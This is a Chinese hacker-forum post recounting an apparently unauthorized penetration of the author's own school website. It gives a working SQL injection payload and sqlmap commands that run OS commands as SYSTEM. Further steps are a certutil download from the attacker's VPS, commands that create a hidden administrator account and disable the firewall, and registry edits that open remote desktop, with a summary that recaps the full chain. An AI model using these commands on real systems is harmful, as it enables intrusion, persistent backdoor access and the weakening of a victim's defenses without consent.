跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

记一次不曲折的校内站点渗透

HACK1949
HACK1949
WEB和服务器安全漏洞

精选回复

发布于

0x01 前言

备考的时候偶然点了进了本校内网的某个站点 , 停下了复习(直接拔剑)

1049983-20220106104512280-663778906.png

0x02 渗透过程

测试到注入

http://url/newdetail.aspx?id=11999' or 1=1 --

直接Sqlmap一把过 , 连waf都没得(狗头)

1049983-20220106104513053-178884482.png

随便看看

python  sqlmap.py -u "http://url/newdetail.aspx?id=119" --batch --dbs
python  sqlmap.py -u "http://url/newdetail.aspx?id=119" --batch -users

1049983-20220106104514484-1843347150.png

DBMS

sqlserver 2005

1049983-20220106104515166-53616618.png

whoami

在windows中nt authority system 是内置的系统管理账户

1049983-20220106104515748-751391338.png

查看下目录chdir

1049983-20220106104516268-1231909659.png

Dir c:\

1049983-20220106104516970-1699368559.png

OS版本

Microsoft(R) Windows(R) Server 2003, Enterprise Edition

1049983-20220106104517567-176420855.png

ipconfig

1049983-20220106104518165-559949965.png

服务器端存在certutil等于是决定测试一下命令

vps

python -m SimpleHTTPServer 80

打一下

ping wt070h.dnslog.cn
certutil.exe -urlcache -split -f http://funny_ip/amazing1x

发现回显

1049983-20220106104518717-936528931.png

奈何网站路径是中文的 , sqlmap写木马的话会乱码 , 找了找解决办法无果

1049983-20220106104519086-1291404844.png

看看环境变量

1049983-20220106104520682-227088344.png

Nmap看看端口

因为尝试远程连接的时候出了一些问题,起初不知道是什么原因所以打算看看

1049983-20220106104523407-1707021554.png

尝试远程连接3389

新建用户

#新建用户
net user amazingadmin123 amazing.123456 /add
#赋予权限
net localgroup Administrators amazingadmin123 /add
#激活用户
net user amazingadmin123 /active:yes
#关闭防火墙
netsh firewall set opmode mode=disable
#开启默认设置 netsh firewall reset

通过注册表开启3389端口

echo Windows Registry Editor Version 5.00 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
echo "fDenyTSConnections"=dword:00000000 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg 
echo "ortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
regedit /s 3389.reg

相关记录

1049983-20220106104525073-1391786797.png

相关记录

1049983-20220106104525998-665197367.png

这个过程连续尝试了两三次都没有成功,也没找到原因,服务还关了,只能先考试等管理员开机了

1049983-20220106104526502-908582224.png

考完试第三天网站上线了,再试试新建用户……

原来是安全策略的问题,不能使用简单地密码,新建用户的时候用了个复杂的密码就行了

远程连接✔️

1049983-20220106104527002-46563665.png

配置加载中……

1049983-20220106104527472-1245304440.png

1049983-20220106104528176-432036921.png

0x03  总结

1.发现主页存在一处注入点
http://url/newdetail.aspx?id=11999' or 1=1 --
2.通过SQLMAP进行注入,执行命令:
sql-shell>select  @@version; //查询数据库版本
sql-os>whoami  //发现是system权限
sql-os>chdir   //查看目录
sql-os>dir c:   //列出C盘目录
sql-os>systeminfo    //查看系统版本
sql-os>ipconfig  //查看系统IP
sql-os>cuertutil  //测试是否存在cuertutil 下载命令
3.在VPS搭建HTTP服务器
python -m SimpleHTTPServer 80
4.可以将cs生成exe上传到VPS服务器上。
5.通过NAMP扫描目标系统开放端口,发现3389存在
6.创建用户并添加到管理员权限,且启用账号和关闭防火功能
#新建用户
sql-os>net user amazingadmin123  Admin@12$12   /add
#赋予权限
sql-os>net localgroup Administrators   amazingadmin123    /add
#激活用户
sql-os>net user amazingadmin123 /active:yes
#关闭防火墙
sql-os>netsh firewall set opmode mode=disable
7.通过mstsc成功远程连接













原文链接: https://xz.aliyun.com/t/9444



创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。